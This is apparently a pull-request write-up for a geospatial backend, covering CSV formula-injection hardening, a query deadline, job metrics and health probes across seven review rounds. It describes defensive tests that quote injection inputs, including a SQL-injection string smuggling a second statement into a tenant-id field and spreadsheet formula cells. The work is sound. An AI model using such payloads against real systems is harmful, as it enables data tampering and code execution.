**CSV formula hardening.** ogr2ogr writes attribute values verbatim, the writer side validates only the column name, the export route is anonymous-reachable for a public dataset, and `records/service.py` advertises `?format=csv` as a DCAT distribution. An editor on one public dataset writes the cell; any visitor who opens the download executes it. The rule moves to `core/csv_safety.py` and all three CSV writers use it. It gains one exemption: a cell that parses as a plain decimal number is left alone, because `-12` is not a formula in any spreadsheet and tab-prefixing it would turn every negative measurement in an exported attribute table into text for pandas and QGIS as much as for Excel. Anything not a well-formed number still gets the tab. Counterfactual: the whole `test_export_csv_formula_hardening_1778.py` module has nothing to import on main.

**Query deadline.** Nothing bounded statement execution on the engine each request uses; `pool_timeout` bounds checkout, and the cluster config sets no `statement_timeout`. It is applied by `get_db`, not by `database_connect_args`, because that property builds the args for the one engine the API and the worker share and the worker legitimately runs single statements for minutes while indexing or reprojecting a fresh table. It listens for `after_begin` on the request's own session rather than issuing one `SET LOCAL`, because `SET LOCAL` ends with its transaction and a handler that writes, commits and reads again would run the rest of the request unbounded. `DB_STATEMENT_TIMEOUT_SECONDS` defaults to 300, inside the edge proxy's 600s window; 0 disables it. Counterfactual: `test_get_db_yields_a_session_that_carries_the_deadline` reads `0` from `pg_settings` on main.

**Multi-worker tile invalidation — documented, not fixed in code.** With no Redis and `UVICORN_WORKERS>1`, a feature edit purges tiles in one worker and the others serve pre-edit MVT for up to `TILE_CACHE_TTL`. The `_v=` buster does not reach the server-side key because the vector tile route does not declare it. Accepting `v` on that route and folding it into `_generation_table_key` is the fix that makes a missed invalidation cost nothing, and it lives in `backend/app/processing/tiles/router.py`, which is in flight on #1791. This PR takes the other half of the audit's recommendation and documents the window in `.env.example` next to the two-process note already on `REDIS_URL`.

## Not in this PR

The production-posture finding (`config.py`, refresh cookie without `Secure` and public `/api/docs` on a release install) is out of scope for this lane by instruction; only the query-deadline item in `config.py` was in scope. Nothing else from the excerpt was widened into.

## Schema, API and config impact

- No schema change, no migration.
- No published API change. `/health/live` is `include_in_schema=False`, so `backend/openapi.json`, both SDKs and `frontend/src/types/api.generated.ts` are untouched; `dump_openapi.py --check` passes clean.
- New setting `DB_STATEMENT_TIMEOUT_SECONDS` (default 300, 0 disables), documented in `.env.example`.
- Operational change: the api container healthcheck and the compose healthcheck now probe `/health/live`. An orchestrator with its own liveness probe pointed at `/health` should move it; readiness stays on `/health`.
- Behaviour change worth calling out for operators: `cols=` no longer projects columns outside an explicit `tile_columns` allowlist. A dataset with a narrow allowlist and a data-driven style keyed on a column outside it will need that column added to the allowlist.

## `_MODULE_LOC_CAPS` moved

Each re-measured with `wc -l` and set to the exact figure, with the reason in the comment beside it.

- `backend/app/api/main.py` 1796 to 1846 (`/health/live` plus the note on `_rate_limit_handler`).
- `backend/app/modules/catalog/datasets/api/router_export.py` 1551 to 1602 (`_cog_presign_seconds` and its rationale).
- `backend/app/core/config.py` 1501 to 1509 (`DB_STATEMENT_TIMEOUT_SECONDS` and why it is not a session default).

## Verification

Run from this worktree on the host against Postgres at localhost:5434.

- `uv run pytest tests/test_layering.py tests/test_rule1_structural.py tests/test_rule2_structural.py -q` — 151 passed
- `uv run pytest tests/test_tile_column_allowlist.py tests/test_tile_cols_cache_key_validation_1778.py tests/test_tiles.py tests/test_tile_cache.py tests/test_tile_signing.py tests/test_vector_tile_auth.py tests/test_tile_cols_endpoint.py tests/test_dataset_tile_columns_metadata.py tests/test_middleware.py tests/test_health.py tests/test_metrics.py -q` — 158 passed
- `uv run pytest tests/test_engine_hides_bound_parameters.py tests/test_access_log_path_redaction.py tests/test_global_rate_limit_envelope_1778.py tests/test_health_liveness_split_1778.py -q` — 18 passed
- `uv run pytest tests/test_jobs_completed_counter_1778.py tests/test_terminal_job_retention_1778.py tests/test_worker_process_metrics_1778.py tests/test_metrics.py -q` — 33 passed
- `uv run pytest tests/test_cog_presign_lifetime_1778.py tests/test_cog_download_access.py tests/test_cog_s3_head_wire_1540.py tests/test_phase_273_cog_redirect_revalidate.py tests/test_download_token.py tests/test_phase_273_download_token.py -q` — 36 passed, 4 skipped
- `uv run pytest tests/test_export_csv_formula_hardening_1778.py tests/test_audit.py tests/test_admin_user_export.py -q` — 55 passed
- `uv run pytest tests/test_request_statement_timeout_1778.py tests/test_config.py -q` — 223 passed
- `uv run pytest tests/test_export.py tests/test_export_access.py tests/test_export_hardening.py tests/test_export_artifact_cache_1532.py tests/test_export_request_budget.py tests/test_export_temp_cleanup.py tests/test_docker_audit_regressions.py -q` — 246 passed
- `cd backend && uv run ruff check . && uv run ruff format --check .` — clean, 1111 files formatted
- `PYTHONPATH=. uv run python scripts/dump_openapi.py --check` — clean, snapshot unchanged

No frontend source changed, so the frontend gates were not run.

## Noticed and left alone

- `tiles/router.py:2446-2448` still justifies the `cols=` union with "cols can only project columns the caller already has REST access to", which does not hold for the signed-template arm. In flight on #1791.
- `.env.example` documents the multi-worker tile window rather than closing it, for the same reason.
- `db/postgresql.conf` still sets no `idle_in_transaction_session_timeout`. The ingest job route holds a transaction open across a 300-second `ogrinfo` subprocess, so any value that bounds an abandoned transaction also kills a working one. That needs the route to stop holding a transaction across a subprocess first.
- The comment above `update_refresh_metrics` in `api/main.py` says "the worker serves no /metrics endpoint", which has not been true since the worker health server was written. Left as found.

## Codex round 1

Three P2s on head 374d8d568, all fixed in one push.

**CSV hardening blocked the event loop and outran the deadline** (`processing/export/ogr.py`). The pass read and rewrote the whole artifact synchronously inside the async request task, so a multi-million-row export stalled every concurrent request in the process, and the only clock on it bounded the ogr2ogr subprocess, not the pass. It now runs through `run_in_thread_draining`, the helper the sibling post-processing steps already use (the shapefile ZIP, the GeoPackage timestamp normalization, the artifact hash) and which also keeps a cancellation from freeing the paths under a live thread. The budget is re-read after the subprocess exits, so the pass gets what the conversion left rather than what it was offered and the post-work reserve stays intact for the hash and the upload. The deadline check is cooperative, every 512 rows, because a thread cannot be killed; an expired budget raises `ExportError` and the partial rewrite is unlinked, so the artifact is either fully hardened or untouched.

Pinned by `test_a_large_pass_does_not_block_a_concurrent_request` (a ticker task driving `asyncio.sleep(0)` must turn while a 200k-row pass runs) and `test_an_expired_deadline_fails_the_export_instead_of_finishing_late`. Counterfactual: replacing the `run_in_thread_draining` call with the inline call makes the first test fail with `loop_turns == 0` (ran it, then restored).

**The purge broke the failure counter** (`platform/jobs/worker.py`, `observability/metrics/jobs.py`). `geolens_jobs_failed_total` was a delta against a snapshot of a row count, and `purge_expired_terminal_jobs` makes a queue's failed group shrink, so `_prev_counts` held the pre-purge figure, the next burst came in below it, and the counter never moved again — taking `GeoLensJobFailures` with it. Both counters are now incremented at the terminal transition and the poll is gauges only; `_prev_counts` is gone.

The middleware decides what is a failure by mirroring `Worker._process_job`'s two rules and only those: a `JobAborted` or a `CancelledError` becomes `aborted`, never `failed`, and anything else is `failed` only when the task's retry strategy declines to retry, because a retried attempt goes back to `todo` and writes no failed row. `fail_stalled_queue_jobs` is the second site that writes a failed row, so it calls the same helper. Both increments are wrapped: a Prometheus problem must not change a job's outcome.

Pinned by `test_a_failure_after_a_purge_still_advances_the_counter` (poll with failed rows, purge, poll with none, one failure, counter +1), plus a case each for retry, abort and the sweep. Counterfactual: restoring the old delta branch and dropping the middleware's failure increment makes that test and `test_a_terminal_failure_increments_the_failed_counter` fail (ran both, then restored).

**`DB_STATEMENT_TIMEOUT_SECONDS` reached no container** (`docker-compose.yml`, `docker-compose.prod.yml`). Documented and read by Settings, but listed in neither manifest, and neither uses `env_file`, so an operator who set it got the default anyway. It now sits on the `x-db-ssl-env` anchor beside the other `DB_` knobs, which the api, worker and migrate services all merge. Only `get_db` applies the deadline, so the worker's behaviour is unchanged; passing it there keeps the two processes configured the same way.

`scripts/check_env_doc_drift.py` grew the rule that would have caught it. Both existing rules passed — the key was documented, and a Settings field counts as a consumer — so the gate had no way to see it. The new rule requires every documented `DB_*` Settings field to reach both `api` and `worker` in both manifests, scoped to that prefix because the whole group is pool and query behaviour that lives on one anchor and a reviewer can check the rule by eye. The allowlist for deliberate exceptions ships empty. Both compose files are already in the gate's CI path filter, so no workflow change was needed. Counterfactual: removing the two new compose lines makes the gate exit 1 naming all four service-manifest pairs (ran it, then restored).

Out of scope, as flagged: the Helm chart values live in the sibling deployment repo and are not touched here. A chart that wants the knob needs its own `values.yaml` entry and a `DB_STATEMENT_TIMEOUT_SECONDS` env mapping; the default is the same 300 either way, so an unmodified chart keeps working.

No `_MODULE_LOC_CAPS` entry moved in round 1. `platform/jobs/worker.py` (843) and `processing/export/ogr.py` (545) are not capped, and the three caps raised earlier in this PR are unchanged.

Round-1 verification, from this worktree against Postgres at localhost:5434:

- `uv run pytest tests/test_layering.py tests/test_rule1_structural.py tests/test_rule2_structural.py -q` — 151 passed
- `uv run pytest tests/test_export_csv_formula_hardening_1778.py tests/test_jobs_completed_counter_1778.py tests/test_terminal_job_retention_1778.py tests/test_worker_process_metrics_1778.py tests/test_metrics.py tests/test_request_statement_timeout_1778.py -q` — 76 passed
- `python3 scripts/check_env_doc_drift.py` — 151 documented keys aligned, exit 0
- `cd backend && uv run ruff check . && uv run ruff format --check .` — clean
- `PYTHONPATH=. uv run python scripts/dump_openapi.py --check` — snapshot unchanged

## Codex round 2

One P1 and two P2s on head 1745fab4a, all fixed in one push.

**P1: the query deadline reached only `get_db`.** Handlers open request-scoped sessions directly through `async_session()` in more than twenty modules, so a per-dependency binding covered none of them. It is now installed on the engine the API process owns. (Round 2 used an asyncpg `server_settings` `do_connect` hook; round 3 below replaces that with a transaction-scoped `SET LOCAL`, because a startup parameter is rejected by standard PgBouncer.)

The install runs at import of `app/api/main.py`, not from the lifespan, because `do_connect` only fires for connections opened after registration and the pool must not have connected first; the lifespan calls it again, idempotently, so a fixture that has rebound `app.core.db.engine` to the test engine gets it too. The engine is late-bound per fix(#909).

It stays out of `database_connect_args`: that property builds the args for the one engine module the API and the worker both import, and the worker legitimately runs single statements for minutes while building a spatial index over a freshly ingested table. The two processes have separate engine instances, so a per-process registration separates them exactly.

Pinned by `test_a_session_from_async_session_runs_under_the_deadline` (a bare `async_session()`-style session, checked across a commit), `test_set_local_still_overrides_it`, and `test_a_worker_engine_gets_no_deadline` — which asserts an uninstalled engine reads `0` and then imports `app.platform.jobs.worker` in a fresh interpreter and asserts `app.api.main` is not in `sys.modules`. Counterfactuals: removing the import-time install fails `test_the_api_entrypoint_installs_it_on_the_engine`; emptying the `do_connect` hook body fails the `async_session` pin (ran both, then restored).

Every `async_session()` call site outside `get_db`, and how each is covered:

Covered by the engine binding, because they run in the API process:
`api/main.py` (7), `api/middleware/tenant_context.py`, `api/middleware/cors.py`, `api/middleware/body_limit.py`, `standards/stac/router.py` (15), `modules/catalog/search/router.py` (2), `modules/catalog/datasets/domain/service_query.py`, `modules/audit/router.py` (2), `modules/audit/service.py`, `modules/admin/router.py`, `modules/admin/backfill_jobs.py` (4), `modules/auth/dependencies.py`, `modules/embed_tokens/service.py`, `processing/ingest/router.py` (2), `processing/ai/token_usage.py`, `platform/jobs/staging_reconcile.py` (reached from `platform/jobs/router.py` and the API sweeper in `platform/jobs/sweep.py`).

Worker paths, deliberately excluded: `platform/jobs/worker.py` (3), `platform/jobs/heartbeat.py` (3, imported only by the `processing/**` task modules), `processing/ingest/tasks_reupload.py` (9), `tasks_vrt.py` (6), `tasks_postgis_refresh.py` (5), `tasks_common.py` (4), `tasks_stac_refresh.py` (3), `tasks_vector.py` (2), `tasks_raster_swap.py`, `tasks_raster_common.py`, `processing/ingest/parquet.py`, `processing/analysis/tasks.py` (2), `processing/embeddings/tasks.py`, `processing/embeddings/backfill.py`.

One module is hosted by both: `platform/refresh/credentials.py` (3). The worker runs `renew_credentials_periodically` and the API sweeper runs `renew_queued_credentials_once`, deliberately, since #1277 found one host was not enough. In the API those sessions get the deadline and in the worker they do not, which is the intended split — the statements are single-row upserts either way.

**P2: the counters ran before persistence.** Procrastinate runs worker middleware inside `Worker._process_job`'s `try`, which is before `_persist_job_status`, so a completion was reported for a job whose terminal row had not been written, and the failure branch had the same ordering. Both increments now hang off `job_manager.finish_job`, the call `_persist_job_status` makes to reach the database, so they advance strictly after the row lands.

Wrapping `finish_job` also retires the hand-mirrored outcome decision the middleware needed: a retry goes through `retry_job` and never arrives, an abort arrives as `Status.ABORTED` and is counted as neither, and the status is the one Procrastinate computed. `fail_stalled_queue_jobs` calls `finish_job_by_id_async` directly and never passes through the wrapper, so its increment stays written out — after the await, for the same reason.

Pinned by `test_a_persistence_failure_leaves_both_counters_unchanged` (both statuses, underlying `finish_job` raising) and `test_a_persisted_success_advances_exactly_one_counter` / `..._failure_...`, plus retry, abort, idempotent-install and ordering cases. One thing the fix surfaced: the sentinel check is `is True` rather than truthy, because an object that answers every attribute reports itself already installed and the wrapper silently counts nothing.

**P2: the numeric exemption weakened the admin and audit exports.** Sharing one helper shared the exemption, so a username of `+123` or an account id of `-001` lost its tab. `escape_csv_formula` is strict by default now, which is what those two have always done and how both call it. `allow_numeric` is opt-in, and its callers decide by column type: `numeric_column_names` reads the declared `data_type` that `get_column_info` stores, so the dataset export exempts a leading sign only in a column PostgreSQL calls `smallint`, `integer`, `bigint`, `decimal`, `numeric`, `real` or `double precision`. The value must still parse as a plain decimal number even inside such a column, so a NULL rendered as an empty string cannot slip through; the header row is always strict; a column name ogr2ogr did not emit does not match, which fails toward escaping; and a dataset with no `column_info` exempts nothing.

Pinned by `test_the_exemption_follows_the_column_not_the_value` (`-1` bare in an `elevation` column, `\t-1` in a `label` column, `-12+A1` escaped in both), `test_the_admin_and_audit_exports_stay_strict` (asserts `+123` and `-001` keep the tab, and that neither module's source mentions `allow_numeric`), and `test_no_declared_numeric_columns_escapes_everything`.

Caps moved in round 2, each re-measured with `wc -l`:

- `backend/app/api/main.py` 1846 to 1883, for `install_api_query_deadline` and the note under it.
- `backend/app/core/config.py` 1509 to 1511, for the two lines of the reworded `DB_STATEMENT_TIMEOUT_SECONDS` rationale.

Round-2 verification, from this worktree against Postgres at localhost:5434:

- `uv run pytest tests/test_layering.py tests/test_rule1_structural.py tests/test_rule2_structural.py -q` — 151 passed
- `uv run pytest tests/test_request_statement_timeout_1778.py tests/test_jobs_completed_counter_1778.py tests/test_export_csv_formula_hardening_1778.py tests/test_terminal_job_retention_1778.py tests/test_worker_process_metrics_1778.py tests/test_metrics.py tests/test_config.py tests/test_audit.py tests/test_admin_user_export.py -q` — 340 passed
- `python3 scripts/check_env_doc_drift.py` — 151 documented keys aligned, exit 0
- `cd backend && uv run ruff check . && uv run ruff format --check .` — clean
- `uv run pytest tests/test_export.py tests/test_export_access.py tests/test_export_hardening.py tests/test_export_artifact_cache_1532.py tests/test_export_request_budget.py tests/test_export_temp_cleanup.py tests/test_stac_api.py tests/test_stac_integration.py -q` — 272 passed
- `PYTHONPATH=. uv run python scripts/dump_openapi.py --check` — snapshot unchanged

## Codex round 3

One P1 on head df7f4c2b6, fixed in 8f7136445.

**The deadline could not survive an external pooler.** asyncpg's `server_settings` travels in the connection startup packet, and standard PgBouncer rejects a startup parameter it does not track. `DB_USE_EXTERNAL_POOLER=true` is a documented, supported topology — `.env.example` describes it and `database_connect_args` already turns off the prepared-statement cache for it — so the round-2 shape would have failed every API connection and taken API startup with it. And the usual remedy is worse than the failure: adding `statement_timeout` to `ignore_startup_parameters` drops the parameter in silence, leaving an operator with a documented deadline that does nothing.

A connection-scoped `SET` is not the alternative either. Under transaction-mode pooling a server connection goes to a different client between transactions, so a session-level `SET` would either be reset away or leak onto someone else's transaction.

The deadline is now issued as `SET LOCAL` at the start of every transaction, under both topologies rather than branching on the flag. A branch is two behaviours that drift, and only one of them gets exercised in CI. It costs one extra round trip per transaction, which is the price of the deadline applying at all when a pooler is in front. A later `SET LOCAL` in the same transaction still wins, so the routes that need longer are unaffected, and the worker stays excluded exactly as before — separate process, entrypoint never imports `app.api.main`.

It rides the engine's `begin` event rather than the ORM `Session`'s `after_begin`, which is a small deviation from the suggestion and worth stating: the listener is then scoped to one engine instance instead of to every `Session` in the process, and it fires for a raw `engine.connect()` transaction as well as an ORM one. `install_tenant_session_hook` uses the same event for the same two reasons, so the file now has one pattern rather than two. (Round 5 below replaces the `set_config` spelling with a plain `SET LOCAL` utility statement, because the SELECT form takes the transaction first snapshot.)

Pins: `test_a_session_from_async_session_runs_under_the_deadline` is parametrized over `DB_USE_EXTERNAL_POOLER` false and true, and in both cases asserts the session runs under the deadline, that it is still in force after a commit and after a rollback (`SET LOCAL` ends with its transaction, so each new one must get it again), and that the captured connect kwargs carry no `server_settings`. The capture listener is registered after the installer on purpose — registered first it snapshots `cparams` before any installer could have added to it, and the assertion passes vacuously. `test_the_installer_sets_no_startup_parameter` asserts the same thing on the source.

Counterfactual: restoring the `do_connect`/`server_settings` form fails three tests — the source check and both parametrizations of the live one, the latter on the connect-args assertion (ran it, then restored). What is not exercised here is PgBouncer's rejection itself, since there is no pooler in the test topology; the connect-args assertion stands in for it, on the documented asyncpg behaviour that `server_settings` is sent in the startup packet.

**On `tiles/pool.py`, which you asked about: it has no startup-packet exposure.** It passes `command_timeout=10`, which is enforced client-side by asyncpg rather than sent to the server, plus `setup`/`init` callbacks and `statement_cache_size=0` when the pooler flag is set. There is no `server_settings` entry anywhere in that module, so nothing of ours reaches a startup packet on the tile path and there is nothing to file as a follow-up on that count. (My round-2 note described `command_timeout` as "the same knob" this module used; that was loose — it is a client-side timeout, not a server setting — and the code comment has been corrected.)

One nearby thing noticed and left alone, since it is pre-existing and not this finding: `_setup_tile_connection` issues `SET ROLE geolens_reader` on each new physical connection, which is session-scoped and therefore not something transaction pooling preserves. The module already documents this and states that per-request role binding is `set_tenant_role_for_tile_request`'s job inside each tile transaction, so the privilege drop is a defence-in-depth layer rather than the mechanism. Worth a separate look for an external-pooler deployment; out of scope here.

Cap moved in round 3, re-measured with `wc -l`:

- `backend/app/core/config.py` 1511 to 1513, for the two lines recording that the deadline is a `SET LOCAL` rather than a startup parameter, and why.

`backend/app/api/main.py` stays at 1883 — the round-3 edit reworded the rationale in `install_api_query_deadline` without changing its length.

Round-3 verification, from this worktree against Postgres at localhost:5434:

- `uv run pytest tests/test_layering.py tests/test_rule1_structural.py tests/test_rule2_structural.py -q` — 151 passed
- `uv run pytest tests/test_request_statement_timeout_1778.py tests/test_config.py tests/test_tenant_session_guc.py tests/test_phase_271_pool_config.py tests/test_runtime_db_role.py -q` — 342 passed
- `python3 scripts/check_env_doc_drift.py` — 151 documented keys aligned, exit 0
- `cd backend && uv run ruff check . && uv run ruff format --check .` — clean
- `uv run pytest tests/test_stac_api.py tests/test_stac_integration.py tests/test_datasets.py tests/test_search.py tests/test_tiles.py -q` — 182 passed (the API paths that now open a transaction-scoped SET LOCAL per transaction)
- `PYTHONPATH=. uv run python scripts/dump_openapi.py --check` — snapshot unchanged

## Codex round 4

One P2 on head 8f7136445, fixed in 88105d370.

**The job counters were alerted on per series, and only one replica was scraped.** The counters are incremented at the terminal transition, inside whichever worker process performed it, so several worker replicas each export their own series for the same queue. `GeoLensJobFailures` compared a bare `increase()`, which PromQL evaluates per series, so six failures split three and three across two replicas crossed nothing and the alert stayed silent while the queue was visibly failing. The reference scrape config compounded it by naming a single `worker:8001` target: a replica nobody scrapes contributes nothing at all.

The alert now reads `sum by (queue) (increase(geolens_jobs_failed_total[15m])) > 5`. The worker scrape job discovers its targets through Docker's embedded DNS (`dns_sd_configs`, `type: A`, `port: 8001`), which returns one A record per running container of a Compose service, so scaling the service needs no edit. A commented per-replica static list sits beside it for deployments off a Compose network, with the note that one entry there is the same bug.

`GeoLensJobQueueBacklog` deliberately keeps `max by (queue)`. Its gauge is polled from `procrastinate_jobs`, so every replica reports the same number and summing would multiply it by the replica count. That distinction is recorded next to the constant the new test iterates.

Pins:

- A promtool case, `job failures split across worker replicas`: two replicas at three failures each over the window, alert fires at six, plus two `promql_expr_test` assertions that each replica alone is at exactly three — which is what PromQL used to compare. Counterfactual: restoring the bare `increase()` makes that case fail with `got:[]` while the pre-existing single-replica case still passes, which is exactly why the old case never caught this (ran it, then restored).
- `test_alerts_over_per_process_job_counters_aggregate_across_replicas` requires every rule over a per-process `geolens_jobs_*_total` series to carry a `sum by` outside its range function, so a future throughput alert on `geolens_jobs_completed_total` cannot ship with the same defect. It asserts it matched at least one rule, so a rename fails loudly instead of passing vacuously.
- `test_the_reference_scrape_config_discovers_every_worker_replica` requires the worker job to carry a `*_sd_configs` block and no lone static target.

`prometheus.yml` was validated by nothing before this. The Monitoring Rules job gains a `promtool check config` step — a `dns_sd_configs` typo is a config Prometheus refuses at startup, which an operator would otherwise find instead of CI — and the backend path filter gains the file, because the new test reads it by literal path (the same reason `alerts.yml` is already there).

**A DB-backed transition count was considered and rejected.** Writing each terminal transition to a table and reading the metric from it reintroduces exactly the coupling this PR removed: the counters were dead in the first place because they were derived from `procrastinate_jobs` rows that `delete_jobs="successful"` deletes, and a new table would need its own retention, its own purge, and its own contention on the queue's hot path. The aggregated per-replica series is sufficient because the terminal transition is now the only increment site — the manager wrapper and the stalled-job sweep, nothing else — so `sum by (queue)` is exact rather than approximate, as long as every replica is scraped. Making that condition true is what the discovery change is for, which is why the two halves shipped together.

No `_MODULE_LOC_CAPS` entry moved in round 4: nothing under `backend/app/` changed.

Round-4 verification, from this worktree:

- `uv run pytest tests/test_alert_rules.py tests/test_layering.py tests/test_rule1_structural.py tests/test_rule2_structural.py -q` — 170 passed
- `promtool check rules infra/monitoring/alerts.yml` — SUCCESS, 8 rules
- `promtool test rules infra/monitoring/alerts.test.yml` — SUCCESS
- `promtool check config infra/monitoring/prometheus.yml` — SUCCESS, valid syntax, 1 rule file
- `cd backend && uv run ruff check . && uv run ruff format --check .` — clean

(promtool runs are the pinned `prom/prometheus:v3.6.0` image the Monitoring Rules job uses.)

## Codex round 5

One P1 on head 88105d370, fixed in 354afeba6. The prescribed fix was right; the symptom named was not, and the real exposure is a regression this PR introduced in a different place. Both measured against the live database rather than reasoned about.

**`SET TRANSACTION READ ONLY` was never affected.** PostgreSQL applies the first-query restriction to `transaction_read_only` only when going read-only to read-write (`check_transaction_read_only` guards `*newval == false`); setting it to true after a snapshot is legal. Driving the sandbox executor's exact sequence through the real engine with both hooks installed gives `read_only='on'`, `statement_timeout='5min'`, the write refused with `ReadOnlySQLTransactionError`, and no server notices. The database-level write backstop held under the old form, and the `require_reader_role=False` fallback was never reached through this path.

**What does break is `SET TRANSACTION ISOLATION LEVEL` and `SET TRANSACTION [NOT] DEFERRABLE`.** Same probe, three first statements against three followers:

| first statement in the transaction | READ ONLY | ISOLATION LEVEL | DEFERRABLE |
| --- | --- | --- | --- |
| none | ok | ok | ok |
| `SELECT set_config(...)` | ok | 25001 must be called before any query | 25001 must be called before any query |
| `SET LOCAL ...` | ok | ok | ok |

That is a regression round 3 introduced, and the repository has already paid for it once through the other hook. `processing/ingest/tasks_postgis_refresh.py:505-523` records it: the in-transaction spelling of REPEATABLE READ worked in single_tenant, where `_on_begin` is a hard no-op, and would have failed every registered-table refresh on a multi-tenant deployment. Adding the deadline as a second `SELECT` hook extended that hazard from multi-tenant-only to every deployment. That workaround stays where it is; this removes the cause.

**Both begin-time hooks converted.** `_on_begin` consumed the first query the same way, so it now issues `SET LOCAL app.current_tenant = '<uuid>'`. `SET` takes no bind parameter, so T-1208-01's guarantee moves from the parameter to the value: `_normalize_context_tenant_id` rejects anything that is not a UUID and returns Python's canonical rendering, 36 characters of hex and hyphens that cannot carry a quote. That is the guard `tenant_data_schema` and `tenant_reader_role` already rely on to interpolate this same value into an identifier (T-1209-14), and it now runs at the sink as well as at the two `current_tenant_var.set` sites. An id that fails it leaves the GUC unset, which is the state RLS already fail-closes on. The deadline's guard is an `int()` round-trip on a value that is already a `ge=0` Settings field.

Pins, with both hooks on one engine: `test_the_hooks_do_not_take_the_transactions_first_snapshot` (ISOLATION LEVEL and DEFERRABLE both succeed, isolation reads `serializable`, deadline still in force); `test_the_sandbox_write_backstop_holds_under_the_hooks` (READ ONLY set, write refused, deadline in force, and an asyncpg log listener asserts the server emitted no notice); `test_neither_begin_hook_issues_a_query`, which reads the source through `ast.unparse` so prose explaining why `set_config` is not used cannot be mistaken for a use of it. Counterfactual: reverting the deadline hook to `SELECT set_config` fails the isolation-level pin and the source rule while every other test in the module still passes, which is why the earlier rounds did not catch it.

One test changed rather than added. `test_guc_bound_param_no_sql_injection` asserted that `tenant-x'; SELECT 1; --` round-tripped into `app.current_tenant`. That was the right proof for a bound parameter and the wrong property to want, since every RLS policy compares against that GUC. It now asserts the stronger guarantee — no error, no injection, GUC left unset — and a sibling asserts a real UUID still arrives, canonicalized.

### CI siblings from head 88105d370 (run 33706009141)

Two Backend Tests failures no targeted run in the earlier rounds covered, fixed in bdc6e9f34.

`test_staging_runtime.py` restated `run_ogr2ogr_export`'s parameter list by hand, so the `numeric_columns` keyword added in round 2 made the double reject a call the real function accepts, and the failure named the test rather than the change. **The test was wrong.** The double now binds whatever it is called with against the real signature, which keeps the property the mirror was reaching for — that the caller passes something `run_ogr2ogr_export` would accept — without going stale when a parameter is added. Swept the rest: every other double of that function (`test_export_temp_cleanup.py` x4, `test_export.py`) already takes `**kwargs`, and the CSV writers have no doubles.

`test_stalled_queue_sweep_624.py` was **the code**, not the test's assumption. The sweep's failure increment read `job.queue` at the call site, outside `count_failed_job`'s guard, so a job object without the attribute raised mid-loop — after some rows had already been failed — and aborted the rest of the sweep. Metrics bookkeeping must never be the thing that stops a sweep, so the read is now defensive and an unlabelled failure counts as `default`. The test's `Job` stub gained `queue` as well, since it is a required field on procrastinate's `Job` and leaving it off is the same drift that stub's own docstring already warns about for `task_kwargs`.

No `_MODULE_LOC_CAPS` entry moved in round 5: `core/statement_timeout.py` (162), `core/db/tenant_session.py` (562) and `platform/jobs/worker.py` (870) are all uncapped.

Round-5 verification, from this worktree against Postgres at localhost:5434:

- `uv run pytest tests/test_staging_runtime.py tests/test_stalled_queue_sweep_624.py tests/test_layering.py tests/test_rule1_structural.py tests/test_rule2_structural.py -q` — 169 passed
- `uv run pytest tests/test_sandbox.py tests/test_sandbox_query_endpoint_565.py tests/test_sandbox_tenant_schema.py tests/test_sec025_sandbox_allowlist.py tests/test_ai_sql_prompt_935.py -q` — 320 passed
- `uv run pytest tests/test_tenant_session_guc.py tests/test_iso05_db_privilege_guc_survival.py -q` — 80 passed, 1 skipped
- `uv run pytest tests/test_request_statement_timeout_1778.py -q` — 14 passed
- `cd backend && uv run ruff check . && uv run ruff format --check .` — clean
- `uv run pytest tests/test_export.py tests/test_export_temp_cleanup.py tests/test_export_antimeridian.py tests/test_export_request_budget.py tests/test_tenant_ingest_export_routing.py tests/test_export_csv_formula_hardening_1778.py tests/test_jobs_completed_counter_1778.py tests/test_terminal_job_retention_1778.py tests/test_staging_runtime.py tests/test_stalled_queue_sweep_624.py -q` — 199 passed
- `PYTHONPATH=. uv run python scripts/dump_openapi.py --check` — snapshot unchanged

## Codex round 6

One P2 on head bdc6e9f34, fixed in 51ea99590. Anchored in `api/main.py`, but the defect was in the docs: `RUNBOOK.md` still told operators "Uptime/liveness checks must target `/api/health`", the endpoint this PR reclassified as dependency readiness. Following it restarts a container that is serving catalog reads perfectly well because Valkey is down — the exact failure the split was added to prevent — and a one-second probe exhausts that endpoint's 60/minute limit on its own, so it eventually answers `429` and reads as a dead process.

The monitoring section now states the split as a table, sends `livenessProbe`, uptime monitors and restart-on-failure checks to `/api/health/live`, and keeps `/api/health` for `readinessProbe`, load-balancer backend checks and dashboards. It records the two differences an operator hits first — the rate limit, and that the liveness route is deliberately absent from the OpenAPI schema and the SDKs, so it is a `curl` target rather than a client call — and keeps the existing warning that a bare `/health` is answered by the SPA catch-all with HTML `200`.

Repository swept for every other `/api/health` and `/health` probe. Each is already correct, for one of two reasons.

Already liveness: `Dockerfile`'s api `HEALTHCHECK`, `docker-compose.yml`'s api healthcheck, and `docker-compose.prod.yml` (no `healthcheck:` override on the api service, so it inherits the image's) all probe `/health/live` as of this PR's first commit. `scripts/lib/common.sh`'s `wait_for_healthy` reads container health through `docker inspect` rather than curling, so it inherits that. `frontend/vite.config.ts` proxies `/health` by prefix, covering `/health/live`.

Readiness, and correct as-is: `RUNBOOK.md:1402` and `:2003` are one-shot post-restore verifications through the edge, which should fail when a dependency is down; `.github/workflows/prod-smoke.yml:182-192` curls `/api/health` after `compose up --wait` as a boot-to-ready gate, same reasoning. `CHANGELOG.md` entries are the historical record and are left alone.

Two things confirmed rather than assumed. `frontend/nginx.conf`'s `location /api/` does `rewrite ^/api/(.*) /$1 break`, a generic prefix rewrite, so `/api/health/live` reaches `api:8000/health/live` with no nginx change — the file is untouched. And there is no Helm chart in this repository (`infra/` holds only `monitoring/`); the chart lives in the sibling deployment repo, so its probe paths need the same change when it is next bumped. That is a follow-up on that repo, not a gap here.

`test_the_runbook_sends_liveness_to_the_liveness_route` pins it: the runbook must name `/api/health/live`, and no line may attach the word liveness to the bare readiness endpoint without also naming the liveness one, so prose contrasting the two still reads naturally while the old sentence fails. Counterfactual: restoring the previous heading fails that test while the other four in the module pass (ran it, then restored).

No `_MODULE_LOC_CAPS` entry moved in round 6: no file under `backend/app/` changed.

Round-6 verification, from this worktree:

- `uv run pytest tests/test_health_liveness_split_1778.py tests/test_layering.py -q` — 52 passed
- `python3 scripts/check_env_doc_drift.py` — 151 documented keys aligned, exit 0
- `cd backend && uv run ruff check . && uv run ruff format --check .` — clean

## Codex round 7

One P2 on head 51ea99590, fixed in 4b7a4cfb2. Reproduced, and enumerating the rest of the request path turned up two more middlewares with the same exposure, so all three ship together.

